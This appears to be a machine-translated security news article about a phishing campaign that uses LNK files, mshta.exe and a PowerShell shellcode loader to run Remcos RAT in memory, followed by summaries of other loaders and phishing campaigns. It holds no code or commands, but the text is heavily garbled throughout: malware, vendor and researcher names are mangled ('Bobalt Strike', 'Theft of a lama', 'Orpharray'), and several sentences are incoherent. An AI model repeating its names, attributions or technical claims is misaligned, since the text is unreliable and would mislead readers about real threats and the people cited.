Cybersecurity researchers spilled light on a new malicious program that uses the Sherlcode loader based on PowerShell to deploy Trajo with remote access called Remcos Rat.
“The actors threatened the malicious LNK files built into the ZIP archives, often dressed in office documents” – Note In a technical report. “The attack chain uses mshta.exe to perform proxy initially. “
The latest wave of attacks, like detailed Qualys, uses baits related to taxes to attract users to the opening of the malicious archive of ZIP, which contains the Windows (LNK) file (LNK), which, in turn, uses mshta.exe, a legitimate Microsoft tool used to launch the HTML (HTA) applications.
The binary is used to execute the embarrassed HTA file called “Xlab22.hta”, located on a remote server, which includes a visual basic script code for downloading the PowerShell, PDF -Dr. and other HTA file, similar to Xlab22.hta called “311.hta”. The HTA file is also customized to make a Windows registry modifications to make sure that “311.hta” is automatically starting when running the system.
Once the PowerShell scenario is executed, it decodes and restores the Shellcode loader, which ultimately continues to start the useful Remcos rats fully in memory.
Remcos Rat is a well-known malicious software that offers a threat to complete control over the impaired systems, making it an ideal tool for cyber spying and data theft. 32-bit binary compiled using Visual Studio C ++ 8, it has a modular structure and can assemble system metadata, magazine keys, screenshot shooting, clipboard data monitoring and getting a list of all installed programs and launch processes.
In addition, it installs the TLS connection with the team server and control (C2) on “Readysteaurants (.) Com supporting a sustainable channel for exports and data management.
This is not the first time in the wild were seen hopeless versions of Remcos rats. In November 2024, the Fortinet Fortinet Lab minute The phishing company that ruthlessly deployed malicious software using lures with theme.
What makes the attack method attractive to the threatening actors is that it allows them to work unnoticed by many traditional security decisions, since the malicious code works directly into the computer memory, leaving very few traces on the disk.
“The growth of attacks based on PowerShell as a new version of Remcos Rat, demonstrates how the threats are developing to avoid traditional security measures,” J. said. Stephen Kowski, Figure Technical Director in Slashnext.
“This ruthless malicious software works directly in memory, using LNK and Mshta.exe files to perform embarrassed PowerShell scenarios that can bypass the usual protection. Expanded email safety that can detect and block malicious LNK investments before they reach users, as it is decided, as it is decided, as it is decided. for suspicious behavior. “
Disclosure of information happens as Palo Alto Networks Unit 42 and Intimidate Detailed new .Net loader used to fall wide range of stolen goods and rats such as Tesla, NovasteAler, Ramcos Rat, VipKeylogger, Xloader and Xworm.
The loader has three stages running in tandem to deploy the final stages of useful load: executed .Net, which built the second and third stage in encrypted form, Dll .Net, which transcripts and loads the next stage, and .Net Dll, which manages the deployment of basic software.
“While earlier versions have built the second stage in the form of a rigid line, the later versions use the resource of the crazy,” said Orpharray. “The first stage takes out and deciphering this data, and then performs them in memory to launch the second stage.”
The 42 block describes the use of clumps to hide the harmful useful loads of AA Technique, which can bypass traditional security mechanisms and evade detection.
The results also coincide with the advent of multiple phishing and social engineering companies that are designed for powers and delivery of malware –
- Using Trojonized Password Management Software Keepass – Codenament Killer – To abandon Bobalt Strike Beacon and steal tangible Keepass database data, including administrative credentials. The malicious installers are located in the Typosquat Typosquat domains provided through Bing ADS.
- Relate Clickfix bait and URL -URL, laid into PDF documents and a number of intermediaries —Pop URLs for deployment Theft of a lama.
- Relate Microsoft Office documents backed up used for deployment Form of books Information theft, protected by the distribution service of malware mentioned as Defender Horus.
- Relate BLOBRI To locally upload the phishing accounting page through the phishing-leaf, the Blob Uris is provided using the pages listed (eg, OneDrive.live (.) COM) that abuse the victims to the malicious area containing the HTML-controlling page.
- Relate Archives of rar Masking as a setup file for distribution Netsupport Rat In attacks aimed at Ukraine and Poland.
- Using Phisching Sheets for Distribution HTML attachments containing a malicious code for capturing victims, accounts and Gmail and highlighted them in a telegram called “Blessed Magazines”, which are active since February 2025
Developments were also supplemented by companies supported by artificial intelligence (AI) using polymorphic tricks that mutated in real time to reach the side. These include modification of the theme of the e -mail, the names of the sender and body content to slip past the detection based on signatures.
“AI gave the subjects threatening to automate malware, large -scale field attacks, and personalized phishing messages with surgical precision,” Cofense – Note.
“These developing threats are becoming more and more able to bypass traditional e -mail filters, emphasizing the abandonment of only the perimeter and the need to detect after delivery. It also allowed them to overcome traditional protection through polymorphic phishing that change the content to the fly. The result: deceptive messages that are more difficult to discover.”
